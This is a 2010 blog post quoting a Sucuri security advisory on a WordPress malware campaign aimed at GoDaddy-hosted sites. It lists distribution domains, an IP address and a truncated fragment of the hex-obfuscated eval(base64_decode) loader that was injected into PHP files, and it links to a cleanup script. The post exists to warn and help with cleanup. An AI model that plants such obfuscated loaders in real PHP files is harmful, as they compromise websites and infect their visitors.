Oct 312010

One of my blogs was hit today (Happy Halloween) by this new strain of WordPress Blog attacks.  The Sucuri Team was able to tackle the infection without issue and has posted some good information on the latest version attacking (at this point) Godaddy servers.  Read more below:

“Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites usinginsomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll. php?k=1

www3.hope-soft57. net
www3.new-protectionsoft23. in
www4.free-pc-protection9. in

http://insomniaboldinfocom.com/mm. php

http://insomniaboldinfonet.com/mm. php

www3.large-defense1. in

All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the eval(base64_decode encoded. What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline. com
meqashoppercom. com
insomniaboldinfocom. com

The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Click this link for more info on Sucuri’s Security Services!

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: +1 (from 1 vote)
Posted by admin Tagged with: , , , , , , , , , , , , , ,
Rss Feed Tweeter button Facebook button Technorati button Myspace button Digg button Stumbleupon button Newsvine button Youtube button

© 2010-2014 She-Geeks.com All Rights Reserved